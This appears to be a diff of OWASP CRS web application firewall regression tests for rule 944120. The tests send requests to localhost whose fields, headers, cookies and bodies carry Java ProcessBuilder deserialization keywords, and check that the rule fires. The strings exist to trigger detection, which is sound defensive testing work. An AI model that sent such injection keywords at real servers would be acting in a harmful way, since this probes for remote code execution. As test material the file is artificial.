Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log: + expect_ids: [944120] + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log: + expect_ids: [944120] + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log: + expect_ids: [944120] + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 